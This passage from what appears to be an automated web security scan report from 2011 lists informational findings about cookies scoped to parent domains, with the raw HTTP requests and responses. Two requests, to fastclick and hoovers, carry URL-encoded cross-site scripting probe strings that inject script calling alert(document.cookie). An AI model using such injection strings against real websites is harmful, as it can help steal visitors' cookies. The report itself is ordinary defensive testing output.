The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weather.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.115. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lyc=AQAAAAEAAIAAAZVagAdAAANsSwAA; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=23189;evt=16009;cat1=19307;cat2=19308;rand=85918057 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|11008:274624:511498:54393:0:1296265712:0|; pjw=BBgAAAACIAMDVnFDTSAGAQABIAMCOSsEYAcCvMkHIA2AEwBT4AIfBDzSAwAFIBcB+hHgAR8AUOACHwHrHIA/ASuq4AEfAE3gAh8BZi6AHwDU4AJfAErgAh8BBjqAHwEI5OABPwBH4AIfASQwgB8BFc3gAR8AROACHwGgN4AfAfXg4AEfAEHgAh8B5i+AHwBf4AI/AD7gAh8CYEUEYRMB/ffgAT8AN+ACHwBfoB8A/OACHwAw4AIfBE5HBAADIR8B6PvgAT8AHeACHwBQID9BZwDX4AI/ABfgAh8BtCmAHwHkwOABPwFBd+EBnwKP6AJgPwEzykGFIS8gAwDw4AI/AMChHwEKzoA/QB8AZOACHwGRQYBfAe7y4AEfAGHgAh8AYyCfQhMBAPjgAR8AW+ACHwBkoB8AAeACHwBY4AIfAIKgXwH78OABPwBR4AIfBCTpAwAKIF4Ax+ACH+ED/wAeoL8AFKGfQL8AP+ACPwBAon8A/qJ/QB8AIOACHwEpP4DfAQ7t4AF/ABjgAh8BYkOAHwFx9cAfAQAA; adv_ic=ByAAAABBd0NNIAYGAAFJAAC2USAHIAtAAAHwceABFwH6XeABFwE+cqAXBEMAAPxI4AEXAGTgAi8Bq17gARfgAy8AaOACFwBh4AIvAZlQ4AEvAD3gAl8AsOACLwBY4AIv4ANH4AMvAeFZ4AFHAFbgAi8A5CDbwNfgAy8BAlvgARcAUOACLwSLXAAABEEEIAACHrNAgR8g7wCpIO8AYCATQAAATeACLwDVIC8AAkAUIAACvQ0/4AAvABsgjwB2IBNAAABL4AIvAdtX4AF3AErgAhcAGuACpwBB4AIXAD/hAgcAIOACFwB54AK/AB3gAhcAxeACLwAY4AIX4QNP4AMXAWU44AGPAVzVoO8giwBk4AIXAIvA1yAXBM1PAAADQNQgAABV4AIXAUdT4AFHACbgAhcAD+ACjwAD4AIXABjgAhcB/gyhNyBfAbda4AFHANzgAhcAxuACFwDY4AIXACjgAkcAxOACFwAV4AIXAKvgAhcBeUfAXwEAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:50 GMT
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=AQAAAAEAAIAAAZVagAdAAANsSwAA; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT

GIF89a.............!.......,...........D..;

16.116. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.hoovers.com
Path:	/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.hoovers.com
Proxy-Connection: keep-alive
Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:54:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/
Location: http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&pccr=true&vidn=26A26274851D2CD5-60000130C044F459&&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:54:49 GMT
Last-Modified: Mon, 31 Jan 2011 01:54:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www334
Content-Length: 0
Content-Type: text/plain

16.117. http://michaelwann.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://michaelwann.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

16.118. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto-insurance/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.119. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.120. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /currency/currency-clash-dollar-vs-euro-smartmoney.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.121. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /identity-theft/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.122. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /market-news/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.123. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mutual-fund/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.124. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /saving-money/50-30-20-budget.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.125. http://redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 29 Jan 2011 23:48:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://moneycentral.msn.com/home.asp
Content-Length: 157
Content-Type: text/html
Set-Cookie: MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>

16.126. http://redacted/detail/stock_quote previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 29 Jan 2011 23:48:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Set-Cookie: MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

16.127. http://redacted/inc/Attributions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/inc/Attributions.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.128. http://redacted/personal-finance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/personal-finance/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal-finance/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://money.redacted/personal-finance/
Set-Cookie: MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/
Cache-Control: private
Content-Length: 0

16.129. http://movies.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.130. http://movies.redacted/academy-awards/snubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/academy-awards/snubs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /academy-awards/snubs/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.131. http://movies.redacted/jason-statham/photo-gallery/feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/jason-statham/photo-gallery/feature/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jason-statham/photo-gallery/feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.132. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.133. http://movies.redacted/new-on-dvd/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/new-on-dvd/movies/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.134. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.135. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.136. http://movies.redacted/showtimes/showtimes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/showtimes/showtimes.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=9fe02721dc3a4a9c834efd7852955ccc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showtimes/showtimes.aspx HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 135
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /showtimes/?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: THTR=IPP=5; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: MC1=V=3&GUID=9fe02721dc3a4a9c834efd7852955ccc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:40 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fshowtimes%2f%3f">here</a>.</h2>
</body></html>

16.137. http://movies.redacted/the-rundown/the-guard/story_5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.redacted
Path:	/the-rundown/the-guard/story_5/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.138. http://msdn.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/
A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:50 GMT
Content-Length: 124

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/">here</a>.</h2>
</body></html>

16.139. http://msdn.microsoft.com/en-us/library/cc838158(VS.95 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/cc838158(VS.95

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
